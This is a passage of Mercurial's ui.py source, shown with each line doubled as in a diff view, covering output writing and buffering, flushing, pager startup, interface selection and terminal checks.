1125 return b"".join(self._buffers.pop())
1125 return b"".join(self._buffers.pop())
1126
1126
1127 def _isbuffered(self, dest):
1127 def _isbuffered(self, dest):
1128 if dest is self._fout:
1128 if dest is self._fout:
1129 return bool(self._buffers)
1129 return bool(self._buffers)
1130 if dest is self._ferr:
1130 if dest is self._ferr:
1131 return bool(self._bufferstates and self._bufferstates[-1][0])
1131 return bool(self._bufferstates and self._bufferstates[-1][0])
1132 return False
1132 return False
1133
1133
1134 def canwritewithoutlabels(self):
1134 def canwritewithoutlabels(self):
1135 '''check if write skips the label'''
1135 '''check if write skips the label'''
1136 if self._buffers and not self._bufferapplylabels:
1136 if self._buffers and not self._bufferapplylabels:
1137 return True
1137 return True
1138 return self._colormode is None
1138 return self._colormode is None
1139
1139
1140 def canbatchlabeledwrites(self):
1140 def canbatchlabeledwrites(self):
1141 '''check if write calls with labels are batchable'''
1141 '''check if write calls with labels are batchable'''
1142 # Windows color printing is special, see ``write``.
1142 # Windows color printing is special, see ``write``.
1143 return self._colormode != b'win32'
1143 return self._colormode != b'win32'
1144
1144
1145 def write(self, *args, **opts):
1145 def write(self, *args, **opts):
1146 """write args to output
1146 """write args to output
1147
1147
1148 By default, this method simply writes to the buffer or stdout.
1148 By default, this method simply writes to the buffer or stdout.
1149 Color mode can be set on the UI class to have the output decorated
1149 Color mode can be set on the UI class to have the output decorated
1150 with color modifier before being written to stdout.
1150 with color modifier before being written to stdout.
1151
1151
1152 The color used is controlled by an optional keyword argument, "label".
1152 The color used is controlled by an optional keyword argument, "label".
1153 This should be a string containing label names separated by space.
1153 This should be a string containing label names separated by space.
1154 Label names take the form of "topic.type". For example, ui.debug()
1154 Label names take the form of "topic.type". For example, ui.debug()
1155 issues a label of "ui.debug".
1155 issues a label of "ui.debug".
1156
1156
1157 Progress reports via stderr are normally cleared before writing as
1157 Progress reports via stderr are normally cleared before writing as
1158 stdout and stderr go to the same terminal. This can be skipped with
1158 stdout and stderr go to the same terminal. This can be skipped with
1159 the optional keyword argument "keepprogressbar". The progress bar
1159 the optional keyword argument "keepprogressbar". The progress bar
1160 will continue to occupy a partial line on stderr in that case.
1160 will continue to occupy a partial line on stderr in that case.
1161 This functionality is intended when Mercurial acts as data source
1161 This functionality is intended when Mercurial acts as data source
1162 in a pipe.
1162 in a pipe.
1163
1163
1164 When labeling output for a specific command, a label of
1164 When labeling output for a specific command, a label of
1165 "cmdname.type" is recommended. For example, status issues
1165 "cmdname.type" is recommended. For example, status issues
1166 a label of "status.modified" for modified files.
1166 a label of "status.modified" for modified files.
1167 """
1167 """
1168 dest = self._fout
1168 dest = self._fout
1169
1169
1170 # inlined _write() for speed
1170 # inlined _write() for speed
1171 if self._buffers:
1171 if self._buffers:
1172 label = opts.get('label', b'')
1172 label = opts.get('label', b'')
1173 if label and self._bufferapplylabels:
1173 if label and self._bufferapplylabels:
1174 self._buffers[-1].extend(self.label(a, label) for a in args)
1174 self._buffers[-1].extend(self.label(a, label) for a in args)
1175 else:
1175 else:
1176 self._buffers[-1].extend(args)
1176 self._buffers[-1].extend(args)
1177 return
1177 return
1178
1178
1179 # inlined _writenobuf() for speed
1179 # inlined _writenobuf() for speed
1180 if not opts.get('keepprogressbar', False):
1180 if not opts.get('keepprogressbar', False):
1181 self._progclear()
1181 self._progclear()
1182 msg = b''.join(args)
1182 msg = b''.join(args)
1183
1183
1184 # opencode timeblockedsection because this is a critical path
1184 # opencode timeblockedsection because this is a critical path
1185 starttime = util.timer()
1185 starttime = util.timer()
1186 try:
1186 try:
1187 if self._colormode == b'win32':
1187 if self._colormode == b'win32':
1188 # windows color printing is its own can of crab, defer to
1188 # windows color printing is its own can of crab, defer to
1189 # the color module and that is it.
1189 # the color module and that is it.
1190 color.win32print(self, dest.write, msg, **opts)
1190 color.win32print(self, dest.write, msg, **opts)
1191 else:
1191 else:
1192 if self._colormode is not None:
1192 if self._colormode is not None:
1193 label = opts.get('label', b'')
1193 label = opts.get('label', b'')
1194 msg = self.label(msg, label)
1194 msg = self.label(msg, label)
1195 dest.write(msg)
1195 dest.write(msg)
1196 except IOError as err:
1196 except IOError as err:
1197 raise error.StdioError(err)
1197 raise error.StdioError(err)
1198 finally:
1198 finally:
1199 self._blockedtimes[b'stdio_blocked'] += (
1199 self._blockedtimes[b'stdio_blocked'] += (
1200 util.timer() - starttime
1200 util.timer() - starttime
1201 ) * 1000
1201 ) * 1000
1202
1202
1203 def write_err(self, *args, **opts):
1203 def write_err(self, *args, **opts):
1204 self._write(self._ferr, *args, **opts)
1204 self._write(self._ferr, *args, **opts)
1205
1205
1206 def _write(self, dest, *args, **opts):
1206 def _write(self, dest, *args, **opts):
1207 # update write() as well if you touch this code
1207 # update write() as well if you touch this code
1208 if self._isbuffered(dest):
1208 if self._isbuffered(dest):
1209 label = opts.get('label', b'')
1209 label = opts.get('label', b'')
1210 if label and self._bufferapplylabels:
1210 if label and self._bufferapplylabels:
1211 self._buffers[-1].extend(self.label(a, label) for a in args)
1211 self._buffers[-1].extend(self.label(a, label) for a in args)
1212 else:
1212 else:
1213 self._buffers[-1].extend(args)
1213 self._buffers[-1].extend(args)
1214 else:
1214 else:
1215 self._writenobuf(dest, *args, **opts)
1215 self._writenobuf(dest, *args, **opts)
1216
1216
1217 def _writenobuf(self, dest, *args, **opts):
1217 def _writenobuf(self, dest, *args, **opts):
1218 # update write() as well if you touch this code
1218 # update write() as well if you touch this code
1219 if not opts.get('keepprogressbar', False):
1219 if not opts.get('keepprogressbar', False):
1220 self._progclear()
1220 self._progclear()
1221 msg = b''.join(args)
1221 msg = b''.join(args)
1222
1222
1223 # opencode timeblockedsection because this is a critical path
1223 # opencode timeblockedsection because this is a critical path
1224 starttime = util.timer()
1224 starttime = util.timer()
1225 try:
1225 try:
1226 if dest is self._ferr and not getattr(self._fout, 'closed', False):
1226 if dest is self._ferr and not getattr(self._fout, 'closed', False):
1227 self._fout.flush()
1227 self._fout.flush()
1228 if getattr(dest, 'structured', False):
1228 if getattr(dest, 'structured', False):
1229 # channel for machine-readable output with metadata, where
1229 # channel for machine-readable output with metadata, where
1230 # no extra colorization is necessary.
1230 # no extra colorization is necessary.
1231 dest.write(msg, **opts)
1231 dest.write(msg, **opts)
1232 elif self._colormode == b'win32':
1232 elif self._colormode == b'win32':
1233 # windows color printing is its own can of crab, defer to
1233 # windows color printing is its own can of crab, defer to
1234 # the color module and that is it.
1234 # the color module and that is it.
1235 color.win32print(self, dest.write, msg, **opts)
1235 color.win32print(self, dest.write, msg, **opts)
1236 else:
1236 else:
1237 if self._colormode is not None:
1237 if self._colormode is not None:
1238 label = opts.get('label', b'')
1238 label = opts.get('label', b'')
1239 msg = self.label(msg, label)
1239 msg = self.label(msg, label)
1240 dest.write(msg)
1240 dest.write(msg)
1241 # stderr may be buffered under win32 when redirected to files,
1241 # stderr may be buffered under win32 when redirected to files,
1242 # including stdout.
1242 # including stdout.
1243 if dest is self._ferr and not getattr(dest, 'closed', False):
1243 if dest is self._ferr and not getattr(dest, 'closed', False):
1244 dest.flush()
1244 dest.flush()
1245 except IOError as err:
1245 except IOError as err:
1246 if dest is self._ferr and err.errno in (
1246 if dest is self._ferr and err.errno in (
1247 errno.EPIPE,
1247 errno.EPIPE,
1248 errno.EIO,
1248 errno.EIO,
1249 errno.EBADF,
1249 errno.EBADF,
1250 ):
1250 ):
1251 # no way to report the error, so ignore it
1251 # no way to report the error, so ignore it
1252 return
1252 return
1253 raise error.StdioError(err)
1253 raise error.StdioError(err)
1254 finally:
1254 finally:
1255 self._blockedtimes[b'stdio_blocked'] += (
1255 self._blockedtimes[b'stdio_blocked'] += (
1256 util.timer() - starttime
1256 util.timer() - starttime
1257 ) * 1000
1257 ) * 1000
1258
1258
1259 def _writemsg(self, dest, *args, **opts):
1259 def _writemsg(self, dest, *args, **opts):
1260 timestamp = self.showtimestamp and opts.get('type') in {
1260 timestamp = self.showtimestamp and opts.get('type') in {
1261 b'debug',
1261 b'debug',
1262 b'error',
1262 b'error',
1263 b'note',
1263 b'note',
1264 b'status',
1264 b'status',
1265 b'warning',
1265 b'warning',
1266 }
1266 }
1267 if timestamp:
1267 if timestamp:
1268 args = (
1268 args = (
1269 b'[%s] '
1269 b'[%s] '
1270 % pycompat.bytestr(datetime.datetime.now().isoformat()),
1270 % pycompat.bytestr(datetime.datetime.now().isoformat()),
1271 ) + args
1271 ) + args
1272 _writemsgwith(self._write, dest, *args, **opts)
1272 _writemsgwith(self._write, dest, *args, **opts)
1273 if timestamp:
1273 if timestamp:
1274 dest.flush()
1274 dest.flush()
1275
1275
1276 def _writemsgnobuf(self, dest, *args, **opts):
1276 def _writemsgnobuf(self, dest, *args, **opts):
1277 _writemsgwith(self._writenobuf, dest, *args, **opts)
1277 _writemsgwith(self._writenobuf, dest, *args, **opts)
1278
1278
1279 def flush(self):
1279 def flush(self):
1280 # opencode timeblockedsection because this is a critical path
1280 # opencode timeblockedsection because this is a critical path
1281 starttime = util.timer()
1281 starttime = util.timer()
1282 try:
1282 try:
1283 try:
1283 try:
1284 self._fout.flush()
1284 self._fout.flush()
1285 except IOError as err:
1285 except IOError as err:
1286 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1286 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1287 raise error.StdioError(err)
1287 raise error.StdioError(err)
1288 finally:
1288 finally:
1289 try:
1289 try:
1290 self._ferr.flush()
1290 self._ferr.flush()
1291 except IOError as err:
1291 except IOError as err:
1292 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1292 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1293 raise error.StdioError(err)
1293 raise error.StdioError(err)
1294 finally:
1294 finally:
1295 self._blockedtimes[b'stdio_blocked'] += (
1295 self._blockedtimes[b'stdio_blocked'] += (
1296 util.timer() - starttime
1296 util.timer() - starttime
1297 ) * 1000
1297 ) * 1000
1298
1298
1299 def _isatty(self, fh):
1299 def _isatty(self, fh):
1300 if self.configbool(b'ui', b'nontty'):
1300 if self.configbool(b'ui', b'nontty'):
1301 return False
1301 return False
1302 return procutil.isatty(fh)
1302 return procutil.isatty(fh)
1303
1303
1304 def protectfinout(self):
1304 def protectfinout(self):
1305 """Duplicate ui streams and redirect original if they are stdio
1305 """Duplicate ui streams and redirect original if they are stdio
1306
1306
1307 Returns (fin, fout) which point to the original ui fds, but may be
1307 Returns (fin, fout) which point to the original ui fds, but may be
1308 copy of them. The returned streams can be considered "owned" in that
1308 copy of them. The returned streams can be considered "owned" in that
1309 print(), exec(), etc. never reach to them.
1309 print(), exec(), etc. never reach to them.
1310 """
1310 """
1311 if self._finoutredirected:
1311 if self._finoutredirected:
1312 # if already redirected, protectstdio() would just create another
1312 # if already redirected, protectstdio() would just create another
1313 # nullfd pair, which is equivalent to returning self._fin/_fout.
1313 # nullfd pair, which is equivalent to returning self._fin/_fout.
1314 return self._fin, self._fout
1314 return self._fin, self._fout
1315 fin, fout = procutil.protectstdio(self._fin, self._fout)
1315 fin, fout = procutil.protectstdio(self._fin, self._fout)
1316 self._finoutredirected = (fin, fout) != (self._fin, self._fout)
1316 self._finoutredirected = (fin, fout) != (self._fin, self._fout)
1317 return fin, fout
1317 return fin, fout
1318
1318
1319 def restorefinout(self, fin, fout):
1319 def restorefinout(self, fin, fout):
1320 """Restore ui streams from possibly duplicated (fin, fout)"""
1320 """Restore ui streams from possibly duplicated (fin, fout)"""
1321 if (fin, fout) == (self._fin, self._fout):
1321 if (fin, fout) == (self._fin, self._fout):
1322 return
1322 return
1323 procutil.restorestdio(self._fin, self._fout, fin, fout)
1323 procutil.restorestdio(self._fin, self._fout, fin, fout)
1324 # protectfinout() won't create more than one duplicated streams,
1324 # protectfinout() won't create more than one duplicated streams,
1325 # so we can just turn the redirection flag off.
1325 # so we can just turn the redirection flag off.
1326 self._finoutredirected = False
1326 self._finoutredirected = False
1327
1327
1328 @contextlib.contextmanager
1328 @contextlib.contextmanager
1329 def protectedfinout(self):
1329 def protectedfinout(self):
1330 """Run code block with protected standard streams"""
1330 """Run code block with protected standard streams"""
1331 fin, fout = self.protectfinout()
1331 fin, fout = self.protectfinout()
1332 try:
1332 try:
1333 yield fin, fout
1333 yield fin, fout
1334 finally:
1334 finally:
1335 self.restorefinout(fin, fout)
1335 self.restorefinout(fin, fout)
1336
1336
1337 def disablepager(self):
1337 def disablepager(self):
1338 self._disablepager = True
1338 self._disablepager = True
1339
1339
1340 def pager(self, command):
1340 def pager(self, command):
1341 """Start a pager for subsequent command output.
1341 """Start a pager for subsequent command output.
1342
1342
1343 Commands which produce a long stream of output should call
1343 Commands which produce a long stream of output should call
1344 this function to activate the user's preferred pagination
1344 this function to activate the user's preferred pagination
1345 mechanism (which may be no pager). Calling this function
1345 mechanism (which may be no pager). Calling this function
1346 precludes any future use of interactive functionality, such as
1346 precludes any future use of interactive functionality, such as
1347 prompting the user or activating curses.
1347 prompting the user or activating curses.
1348
1348
1349 Args:
1349 Args:
1350 command: The full, non-aliased name of the command. That is, "log"
1350 command: The full, non-aliased name of the command. That is, "log"
1351 not "history, "summary" not "summ", etc.
1351 not "history, "summary" not "summ", etc.
1352 """
1352 """
1353 if self._disablepager or self.pageractive:
1353 if self._disablepager or self.pageractive:
1354 # how pager should do is already determined
1354 # how pager should do is already determined
1355 return
1355 return
1356
1356
1357 if not command.startswith(b'internal-always-') and (
1357 if not command.startswith(b'internal-always-') and (
1358 # explicit --pager=on (= 'internal-always-' prefix) should
1358 # explicit --pager=on (= 'internal-always-' prefix) should
1359 # take precedence over disabling factors below
1359 # take precedence over disabling factors below
1360 command in self.configlist(b'pager', b'ignore')
1360 command in self.configlist(b'pager', b'ignore')
1361 or not self.configbool(b'ui', b'paginate')
1361 or not self.configbool(b'ui', b'paginate')
1362 or not self.configbool(b'pager', b'attend-' + command, True)
1362 or not self.configbool(b'pager', b'attend-' + command, True)
1363 or encoding.environ.get(b'TERM') == b'dumb'
1363 or encoding.environ.get(b'TERM') == b'dumb'
1364 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1364 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1365 # formatted() will need some adjustment.
1365 # formatted() will need some adjustment.
1366 or not self.formatted()
1366 or not self.formatted()
1367 or self.plain()
1367 or self.plain()
1368 or self._buffers
1368 or self._buffers
1369 # TODO: expose debugger-enabled on the UI object
1369 # TODO: expose debugger-enabled on the UI object
1370 or b'--debugger' in pycompat.sysargv
1370 or b'--debugger' in pycompat.sysargv
1371 ):
1371 ):
1372 # We only want to paginate if the ui appears to be
1372 # We only want to paginate if the ui appears to be
1373 # interactive, the user didn't say HGPLAIN or
1373 # interactive, the user didn't say HGPLAIN or
1374 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1374 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1375 return
1375 return
1376
1376
1377 pagercmd = self.config(b'pager', b'pager', rcutil.fallbackpager)
1377 pagercmd = self.config(b'pager', b'pager', rcutil.fallbackpager)
1378 if not pagercmd:
1378 if not pagercmd:
1379 return
1379 return
1380
1380
1381 pagerenv = {}
1381 pagerenv = {}
1382 for name, value in rcutil.defaultpagerenv().items():
1382 for name, value in rcutil.defaultpagerenv().items():
1383 if name not in encoding.environ:
1383 if name not in encoding.environ:
1384 pagerenv[name] = value
1384 pagerenv[name] = value
1385
1385
1386 self.debug(
1386 self.debug(
1387 b'starting pager for command %s\n' % stringutil.pprint(command)
1387 b'starting pager for command %s\n' % stringutil.pprint(command)
1388 )
1388 )
1389 self.flush()
1389 self.flush()
1390
1390
1391 wasformatted = self.formatted()
1391 wasformatted = self.formatted()
1392 if util.safehasattr(signal, b"SIGPIPE"):
1392 if util.safehasattr(signal, b"SIGPIPE"):
1393 signal.signal(signal.SIGPIPE, _catchterm)
1393 signal.signal(signal.SIGPIPE, _catchterm)
1394 if self._runpager(pagercmd, pagerenv):
1394 if self._runpager(pagercmd, pagerenv):
1395 self.pageractive = True
1395 self.pageractive = True
1396 # Preserve the formatted-ness of the UI. This is important
1396 # Preserve the formatted-ness of the UI. This is important
1397 # because we mess with stdout, which might confuse
1397 # because we mess with stdout, which might confuse
1398 # auto-detection of things being formatted.
1398 # auto-detection of things being formatted.
1399 self.setconfig(b'ui', b'formatted', wasformatted, b'pager')
1399 self.setconfig(b'ui', b'formatted', wasformatted, b'pager')
1400 self.setconfig(b'ui', b'interactive', False, b'pager')
1400 self.setconfig(b'ui', b'interactive', False, b'pager')
1401
1401
1402 # If pagermode differs from color.mode, reconfigure color now that
1402 # If pagermode differs from color.mode, reconfigure color now that
1403 # pageractive is set.
1403 # pageractive is set.
1404 cm = self._colormode
1404 cm = self._colormode
1405 if cm != self.config(b'color', b'pagermode', cm):
1405 if cm != self.config(b'color', b'pagermode', cm):
1406 color.setup(self)
1406 color.setup(self)
1407 else:
1407 else:
1408 # If the pager can't be spawned in dispatch when --pager=on is
1408 # If the pager can't be spawned in dispatch when --pager=on is
1409 # given, don't try again when the command runs, to avoid a duplicate
1409 # given, don't try again when the command runs, to avoid a duplicate
1410 # warning about a missing pager command.
1410 # warning about a missing pager command.
1411 self.disablepager()
1411 self.disablepager()
1412
1412
1413 def _runpager(self, command, env=None):
1413 def _runpager(self, command, env=None):
1414 """Actually start the pager and set up file descriptors.
1414 """Actually start the pager and set up file descriptors.
1415
1415
1416 This is separate in part so that extensions (like chg) can
1416 This is separate in part so that extensions (like chg) can
1417 override how a pager is invoked.
1417 override how a pager is invoked.
1418 """
1418 """
1419 if command == b'cat':
1419 if command == b'cat':
1420 # Save ourselves some work.
1420 # Save ourselves some work.
1421 return False
1421 return False
1422 # If the command doesn't contain any of these characters, we
1422 # If the command doesn't contain any of these characters, we
1423 # assume it's a binary and exec it directly. This means for
1423 # assume it's a binary and exec it directly. This means for
1424 # simple pager command configurations, we can degrade
1424 # simple pager command configurations, we can degrade
1425 # gracefully and tell the user about their broken pager.
1425 # gracefully and tell the user about their broken pager.
1426 shell = any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")
1426 shell = any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")
1427
1427
1428 if pycompat.iswindows and not shell:
1428 if pycompat.iswindows and not shell:
1429 # Window's built-in `more` cannot be invoked with shell=False, but
1429 # Window's built-in `more` cannot be invoked with shell=False, but
1430 # its `more.com` can. Hide this implementation detail from the
1430 # its `more.com` can. Hide this implementation detail from the
1431 # user so we can also get sane bad PAGER behavior. MSYS has
1431 # user so we can also get sane bad PAGER behavior. MSYS has
1432 # `more.exe`, so do a cmd.exe style resolution of the executable to
1432 # `more.exe`, so do a cmd.exe style resolution of the executable to
1433 # determine which one to use.
1433 # determine which one to use.
1434 fullcmd = procutil.findexe(command)
1434 fullcmd = procutil.findexe(command)
1435 if not fullcmd:
1435 if not fullcmd:
1436 self.warn(
1436 self.warn(
1437 _(b"missing pager command '%s', skipping pager\n") % command
1437 _(b"missing pager command '%s', skipping pager\n") % command
1438 )
1438 )
1439 return False
1439 return False
1440
1440
1441 command = fullcmd
1441 command = fullcmd
1442
1442
1443 try:
1443 try:
1444 pager = subprocess.Popen(
1444 pager = subprocess.Popen(
1445 procutil.tonativestr(command),
1445 procutil.tonativestr(command),
1446 shell=shell,
1446 shell=shell,
1447 bufsize=-1,
1447 bufsize=-1,
1448 close_fds=procutil.closefds,
1448 close_fds=procutil.closefds,
1449 stdin=subprocess.PIPE,
1449 stdin=subprocess.PIPE,
1450 stdout=procutil.stdout,
1450 stdout=procutil.stdout,
1451 stderr=procutil.stderr,
1451 stderr=procutil.stderr,
1452 env=procutil.tonativeenv(procutil.shellenviron(env)),
1452 env=procutil.tonativeenv(procutil.shellenviron(env)),
1453 )
1453 )
1454 except OSError as e:
1454 except OSError as e:
1455 if e.errno == errno.ENOENT and not shell:
1455 if e.errno == errno.ENOENT and not shell:
1456 self.warn(
1456 self.warn(
1457 _(b"missing pager command '%s', skipping pager\n") % command
1457 _(b"missing pager command '%s', skipping pager\n") % command
1458 )
1458 )
1459 return False
1459 return False
1460 raise
1460 raise
1461
1461
1462 # back up original file descriptors
1462 # back up original file descriptors
1463 stdoutfd = os.dup(procutil.stdout.fileno())
1463 stdoutfd = os.dup(procutil.stdout.fileno())
1464 stderrfd = os.dup(procutil.stderr.fileno())
1464 stderrfd = os.dup(procutil.stderr.fileno())
1465
1465
1466 os.dup2(pager.stdin.fileno(), procutil.stdout.fileno())
1466 os.dup2(pager.stdin.fileno(), procutil.stdout.fileno())
1467 if self._isatty(procutil.stderr):
1467 if self._isatty(procutil.stderr):
1468 os.dup2(pager.stdin.fileno(), procutil.stderr.fileno())
1468 os.dup2(pager.stdin.fileno(), procutil.stderr.fileno())
1469
1469
1470 @self.atexit
1470 @self.atexit
1471 def killpager():
1471 def killpager():
1472 if util.safehasattr(signal, b"SIGINT"):
1472 if util.safehasattr(signal, b"SIGINT"):
1473 signal.signal(signal.SIGINT, signal.SIG_IGN)
1473 signal.signal(signal.SIGINT, signal.SIG_IGN)
1474 # restore original fds, closing pager.stdin copies in the process
1474 # restore original fds, closing pager.stdin copies in the process
1475 os.dup2(stdoutfd, procutil.stdout.fileno())
1475 os.dup2(stdoutfd, procutil.stdout.fileno())
1476 os.dup2(stderrfd, procutil.stderr.fileno())
1476 os.dup2(stderrfd, procutil.stderr.fileno())
1477 pager.stdin.close()
1477 pager.stdin.close()
1478 pager.wait()
1478 pager.wait()
1479
1479
1480 return True
1480 return True
1481
1481
1482 @property
1482 @property
1483 def _exithandlers(self):
1483 def _exithandlers(self):
1484 return _reqexithandlers
1484 return _reqexithandlers
1485
1485
1486 def atexit(self, func, *args, **kwargs):
1486 def atexit(self, func, *args, **kwargs):
1487 """register a function to run after dispatching a request
1487 """register a function to run after dispatching a request
1488
1488
1489 Handlers do not stay registered across request boundaries."""
1489 Handlers do not stay registered across request boundaries."""
1490 self._exithandlers.append((func, args, kwargs))
1490 self._exithandlers.append((func, args, kwargs))
1491 return func
1491 return func
1492
1492
1493 def interface(self, feature):
1493 def interface(self, feature):
1494 """what interface to use for interactive console features?
1494 """what interface to use for interactive console features?
1495
1495
1496 The interface is controlled by the value of `ui.interface` but also by
1496 The interface is controlled by the value of `ui.interface` but also by
1497 the value of feature-specific configuration. For example:
1497 the value of feature-specific configuration. For example:
1498
1498
1499 ui.interface.histedit = text
1499 ui.interface.histedit = text
1500 ui.interface.chunkselector = curses
1500 ui.interface.chunkselector = curses
1501
1501
1502 Here the features are "histedit" and "chunkselector".
1502 Here the features are "histedit" and "chunkselector".
1503
1503
1504 The configuration above means that the default interfaces for commands
1504 The configuration above means that the default interfaces for commands
1505 is curses, the interface for histedit is text and the interface for
1505 is curses, the interface for histedit is text and the interface for
1506 selecting chunk is crecord (the best curses interface available).
1506 selecting chunk is crecord (the best curses interface available).
1507
1507
1508 Consider the following example:
1508 Consider the following example:
1509 ui.interface = curses
1509 ui.interface = curses
1510 ui.interface.histedit = text
1510 ui.interface.histedit = text
1511
1511
1512 Then histedit will use the text interface and chunkselector will use
1512 Then histedit will use the text interface and chunkselector will use
1513 the default curses interface (crecord at the moment).
1513 the default curses interface (crecord at the moment).
1514 """
1514 """
1515 alldefaults = frozenset([b"text", b"curses"])
1515 alldefaults = frozenset([b"text", b"curses"])
1516
1516
1517 featureinterfaces = {
1517 featureinterfaces = {
1518 b"chunkselector": [
1518 b"chunkselector": [
1519 b"text",
1519 b"text",
1520 b"curses",
1520 b"curses",
1521 ],
1521 ],
1522 b"histedit": [
1522 b"histedit": [
1523 b"text",
1523 b"text",
1524 b"curses",
1524 b"curses",
1525 ],
1525 ],
1526 }
1526 }
1527
1527
1528 # Feature-specific interface
1528 # Feature-specific interface
1529 if feature not in featureinterfaces.keys():
1529 if feature not in featureinterfaces.keys():
1530 # Programming error, not user error
1530 # Programming error, not user error
1531 raise ValueError(b"Unknown feature requested %s" % feature)
1531 raise ValueError(b"Unknown feature requested %s" % feature)
1532
1532
1533 availableinterfaces = frozenset(featureinterfaces[feature])
1533 availableinterfaces = frozenset(featureinterfaces[feature])
1534 if alldefaults > availableinterfaces:
1534 if alldefaults > availableinterfaces:
1535 # Programming error, not user error. We need a use case to
1535 # Programming error, not user error. We need a use case to
1536 # define the right thing to do here.
1536 # define the right thing to do here.
1537 raise ValueError(
1537 raise ValueError(
1538 b"Feature %s does not handle all default interfaces" % feature
1538 b"Feature %s does not handle all default interfaces" % feature
1539 )
1539 )
1540
1540
1541 if self.plain() or encoding.environ.get(b'TERM') == b'dumb':
1541 if self.plain() or encoding.environ.get(b'TERM') == b'dumb':
1542 return b"text"
1542 return b"text"
1543
1543
1544 # Default interface for all the features
1544 # Default interface for all the features
1545 defaultinterface = b"text"
1545 defaultinterface = b"text"
1546 i = self.config(b"ui", b"interface")
1546 i = self.config(b"ui", b"interface")
1547 if i in alldefaults:
1547 if i in alldefaults:
1548 defaultinterface = i
1548 defaultinterface = i
1549
1549
1550 choseninterface = defaultinterface
1550 choseninterface = defaultinterface
1551 f = self.config(b"ui", b"interface.%s" % feature)
1551 f = self.config(b"ui", b"interface.%s" % feature)
1552 if f in availableinterfaces:
1552 if f in availableinterfaces:
1553 choseninterface = f
1553 choseninterface = f
1554
1554
1555 if i is not None and defaultinterface != i:
1555 if i is not None and defaultinterface != i:
1556 if f is not None:
1556 if f is not None:
1557 self.warn(_(b"invalid value for ui.interface: %s\n") % (i,))
1557 self.warn(_(b"invalid value for ui.interface: %s\n") % (i,))
1558 else:
1558 else:
1559 self.warn(
1559 self.warn(
1560 _(b"invalid value for ui.interface: %s (using %s)\n")
1560 _(b"invalid value for ui.interface: %s (using %s)\n")
1561 % (i, choseninterface)
1561 % (i, choseninterface)
1562 )
1562 )
1563 if f is not None and choseninterface != f:
1563 if f is not None and choseninterface != f:
1564 self.warn(
1564 self.warn(
1565 _(b"invalid value for ui.interface.%s: %s (using %s)\n")
1565 _(b"invalid value for ui.interface.%s: %s (using %s)\n")
1566 % (feature, f, choseninterface)
1566 % (feature, f, choseninterface)
1567 )
1567 )
1568
1568
1569 return choseninterface
1569 return choseninterface
1570
1570
1571 def interactive(self):
1571 def interactive(self):
1572 """is interactive input allowed?
1572 """is interactive input allowed?
1573
1573
1574 An interactive session is a session where input can be reasonably read
1574 An interactive session is a session where input can be reasonably read
1575 from `sys.stdin'. If this function returns false, any attempt to read
1575 from `sys.stdin'. If this function returns false, any attempt to read
1576 from stdin should fail with an error, unless a sensible default has been
1576 from stdin should fail with an error, unless a sensible default has been
1577 specified.
1577 specified.
1578
1578
1579 Interactiveness is triggered by the value of the `ui.interactive'
1579 Interactiveness is triggered by the value of the `ui.interactive'
1580 configuration variable or - if it is unset - when `sys.stdin' points
1580 configuration variable or - if it is unset - when `sys.stdin' points
1581 to a terminal device.
1581 to a terminal device.
1582
1582
1583 This function refers to input only; for output, see `ui.formatted()'.
1583 This function refers to input only; for output, see `ui.formatted()'.
1584 """
1584 """
1585 i = self.configbool(b"ui", b"interactive")
1585 i = self.configbool(b"ui", b"interactive")
1586 if i is None:
1586 if i is None:
1587 # some environments replace stdin without implementing isatty
1587 # some environments replace stdin without implementing isatty
1588 # usually those are non-interactive
1588 # usually those are non-interactive
1589 return self._isatty(self._fin)
1589 return self._isatty(self._fin)
1590
1590
1591 return i
1591 return i
1592
1592
1593 def termwidth(self):
1593 def termwidth(self):
1594 """how wide is the terminal in columns?"""
1594 """how wide is the terminal in columns?"""
1595 if b'COLUMNS' in encoding.environ:
1595 if b'COLUMNS' in encoding.environ:
1596 try:
1596 try:
1597 return int(encoding.environ[b'COLUMNS'])
1597 return int(encoding.environ[b'COLUMNS'])
1598 except ValueError:
1598 except ValueError:
1599 pass
1599 pass
1600 return scmutil.termsize(self)[0]
1600 return scmutil.termsize(self)[0]
1601
1601
1602 def formatted(self):
1602 def formatted(self):
1603 """should formatted output be used?
1603 """should formatted output be used?
1604
1604
1605 It is often desirable to format the output to suite the output medium.
1605 It is often desirable to format the output to suite the output medium.
1606 Examples of this are truncating long lines or colorizing messages.
1606 Examples of this are truncating long lines or colorizing messages.
1607 However, this is not often not desirable when piping output into other
1607 However, this is not often not desirable when piping output into other
1608 utilities, e.g. `grep'.
1608 utilities, e.g. `grep'.
1609
1609
1610 Formatted output is triggered by the value of the `ui.formatted'
1610 Formatted output is triggered by the value of the `ui.formatted'
1611 configuration variable or - if it is unset - when `sys.stdout' points
1611 configuration variable or - if it is unset - when `sys.stdout' points
1612 to a terminal device. Please note that `ui.formatted' should be
1612 to a terminal device. Please note that `ui.formatted' should be
1613 considered an implementation detail; it is not intended for use outside
1613 considered an implementation detail; it is not intended for use outside
1614 Mercurial or its extensions.
1614 Mercurial or its extensions.
1615
1615
1616 This function refers to output only; for input, see `ui.interactive()'.
1616 This function refers to output only; for input, see `ui.interactive()'.
1617 This function always returns false when in plain mode, see `ui.plain()'.
1617 This function always returns false when in plain mode, see `ui.plain()'.
1618 """
1618 """
1619 if self.plain():
1619 if self.plain():
1620 return False
1620 return False
1621
1621
1622 i = self.configbool(b"ui", b"formatted")
1622 i = self.configbool(b"ui", b"formatted")
1623 if i is None:
1623 if i is None:
1624 # some environments replace stdout without implementing isatty
1624 # some environments replace stdout without implementing isatty
1625 # usually those are non-interactive
1625 # usually those are non-interactive
1626 return self._isatty(self._fout)
1626 return self._isatty(self._fout)
1627
1627
1628 return i
1628 return i
1629
1629
1630 def _readline(self, prompt=b' ', promptopts=None):
1630 def _readline(self, prompt=b' ', promptopts=None):
1631 # Replacing stdin/stdout temporarily is a hard problem on Python 3
1631 # Replacing stdin/stdout temporarily is a hard problem on Python 3
1632 # because they have to be text streams with *no buffering*. Instead,
1632 # because they have to be text streams with *no buffering*. Instead,
